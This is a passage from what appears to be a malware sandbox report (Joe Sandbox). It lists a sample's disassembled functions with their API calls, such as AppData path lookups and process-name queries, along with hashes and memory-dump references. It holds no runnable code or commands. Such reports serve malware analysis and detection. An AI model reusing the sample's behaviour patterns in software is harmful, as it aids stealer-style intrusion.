                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$Xu~$xt~
                              • API String ID: 3105635775-1326991048
                              • Opcode ID: 3378751c563d7f72785e77b42d597b8c9745ded80d35cc66f6759ed011976044
                              • Instruction ID: e6c03cd6275d5104cac615da076cb8959450ec63e573269bf5c68e93603eb1e9
                              • Opcode Fuzzy Hash: 3378751c563d7f72785e77b42d597b8c9745ded80d35cc66f6759ed011976044
                              • Instruction Fuzzy Hash: EB018071545B40DAD724AFB9D80E74ABBF0AF50324F20890FE4D5573E1CBB8AA44CB15
                              Function 007CE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CE544
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE573
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE581
                              • lstrcat.KERNEL32(?,0145D2A0), ref: 007CE59C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 244a3618354a58ca51e3fea00acf90b3f21c9eaabc9266a4e218812b82229886
                              • Instruction ID: 864722442cb72e65f45303fdd56334468e650da9ce1494f762e00a31317b99c8
                              • Opcode Fuzzy Hash: 244a3618354a58ca51e3fea00acf90b3f21c9eaabc9266a4e218812b82229886
                              • Instruction Fuzzy Hash: 445188B5910108EBDB55EF54EC86FEE337DFB48300F44446DB90AA7241DE74AE459BA0
                              Function 007D1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 007D1FDF, 007D1FF5, 007D20B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: strlen
                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 39653677-4138519520
                              • Opcode ID: b710f0ec8f5f451958e953f4348574866c89379115a775d3d7abf00d5e914301
                              • Instruction ID: 30927540a02d5fa86347a30d678871135e4cd69e93faba6cf73d5d4c97bb6084
                              • Opcode Fuzzy Hash: b710f0ec8f5f451958e953f4348574866c89379115a775d3d7abf00d5e914301
                              • Instruction Fuzzy Hash: A12126399102898BDB20EA35C4446DDF7B6EF94762F884057C8194B383E33E191BD796
                              Function 007CEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CEBB4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CEBE3
                              • lstrcat.KERNEL32(?,00000000), ref: 007CEBF1
                              • lstrcat.KERNEL32(?,0145DCA8), ref: 007CEC0C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: e320f783a263011baf9fab7613bb7d2221f1cae69782ce3099e0621899836af8
                              • Instruction ID: 7c7359fad1988fbd198217de419dcd629efeaa9b750f09e1044e2b34c4efeede
                              • Opcode Fuzzy Hash: e320f783a263011baf9fab7613bb7d2221f1cae69782ce3099e0621899836af8
                              • Instruction Fuzzy Hash: 1A31A971911158EBCB61EF64DC45FEE73B4BF48300F1044A8BA0ABB241DE749E458B90
                              Function 007D4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000), ref: 007D4492
                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 007D44AD
                              • CloseHandle.KERNEL32(00000000), ref: 007D44B4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D44E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                              • String ID:
                              • API String ID: 4028989146-0
                              • Opcode ID: e9ef430251eea695b48e015f3da907ae13e15cba3fc28f2a5dcafc6908389935
                              • Instruction ID: 57557a92828375b5eb3bff33ac2f5ac73ed63fe52cbb8d50e34bda33fec0b6ec
                              • Opcode Fuzzy Hash: e9ef430251eea695b48e015f3da907ae13e15cba3fc28f2a5dcafc6908389935
                              • Instruction Fuzzy Hash: E1F0FCB09056956BE7209B74DC4DBE67AB8AF14305F0405A1FA49DB280DBB49CC08790
                              Function 007D8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 007D8FDD
                                • Part of subcall function 007D87FF: __amsg_exit.LIBCMT ref: 007D880F
                              • __getptd.LIBCMT ref: 007D8FF4
                              • __amsg_exit.LIBCMT ref: 007D9002
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 007D9026
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 9fa734c1ecf28648d3a38dd521efe8fe926db452ccc7903cdf3ec3675ebea47c
                              • Instruction ID: 75feb742e89ce40832ad7f1900f7392629084bbe9e9bc3a9d2d82b2e71d378c5
                              • Opcode Fuzzy Hash: 9fa734c1ecf28648d3a38dd521efe8fe926db452ccc7903cdf3ec3675ebea47c
                              • Instruction Fuzzy Hash: A8F09632909710DBD7A4BB78680F75D33B16F04720F24810BF544AA3D2EF6C5900E66A
                              Function 007D7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(------,007B5BEB), ref: 007D731B
                              • lstrcpy.KERNEL32(00000000), ref: 007D733F
                              • lstrcat.KERNEL32(?,------), ref: 007D7349
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcatlstrcpylstrlen
                              • String ID: ------
                              • API String ID: 3050337572-882505780
                              • Opcode ID: a1b7ea84b1a85990c8dc456cc434745692d38ab78763d691e3b406a780d11851
                              • Instruction ID: 4d72b219829b464c2d04fb1a377da8d2018cc374605fe9eb293295d445cd2015
                              • Opcode Fuzzy Hash: a1b7ea84b1a85990c8dc456cc434745692d38ab78763d691e3b406a780d11851
                              • Instruction Fuzzy Hash: 93F039745193429FDB289F35DC89927BAF8EF84705318882EA89AC7314EB34E840DB10
                              Function 007C33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C3422
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C344B
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C3471
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C3497
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: e2f407f80b30abe914e0767ac0bfe79ad9858299bc9de5c392e90ab74c6bac05
                              • Instruction ID: 09c7cd61501512775f8a64f6f13becda3812b35773ae6f7c9dd6bd7983929b92
                              • Opcode Fuzzy Hash: e2f407f80b30abe914e0767ac0bfe79ad9858299bc9de5c392e90ab74c6bac05
                              • Instruction Fuzzy Hash: DA12FD70A152018FDB18CF29D594F25B7E5BF45718B19C0AEE809DB3A2D77AED42CB40
                              Function 007C7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7C94
                              • std::_Xinvalid_argument.LIBCPMT ref: 007C7CAF
                                • Part of subcall function 007C7D40: std::_Xinvalid_argument.LIBCPMT ref: 007C7D58
                                • Part of subcall function 007C7D40: std::_Xinvalid_argument.LIBCPMT ref: 007C7D76
                                • Part of subcall function 007C7D40: std::_Xinvalid_argument.LIBCPMT ref: 007C7D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: string too long
                              • API String ID: 909987262-2556327735
                              • Opcode ID: 700439c79636f4ee4bdd6f8fbfee73f1005440bb4505444444af463f68f1a5c0
                              • Instruction ID: 541d635f14c749be2871b0e725299ec48c30d8c7dc8db6787dca7ca964621021
                              • Opcode Fuzzy Hash: 700439c79636f4ee4bdd6f8fbfee73f1005440bb4505444444af463f68f1a5c0
                              • Instruction Fuzzy Hash: 9431D6723082158BD7389D6CE880F6AF7EDEF91750B20462EF5528B641DB799C41CBB4
                              Function 007B6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 007B6F74
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B6F7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID: @
                              • API String ID: 1357844191-2766056989
                              • Opcode ID: cbea2e3fa03576ede8a7762ec51dae29c4440dbb56ac6ab5b1f6ac087163ce10
                              • Instruction ID: d2ceef6d5572559b52c1689823b2629b4bf11672fe5448195a0f49589b7f3301
                              • Opcode Fuzzy Hash: cbea2e3fa03576ede8a7762ec51dae29c4440dbb56ac6ab5b1f6ac087163ce10
                              • Instruction Fuzzy Hash: 5A215CB16006019FEB20CB24DC85BBA73A8EB41705F448978FA46CBA85FB7DE946C750
                              Function 007D1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 007D15A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D15D9
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D1611
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D1649
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
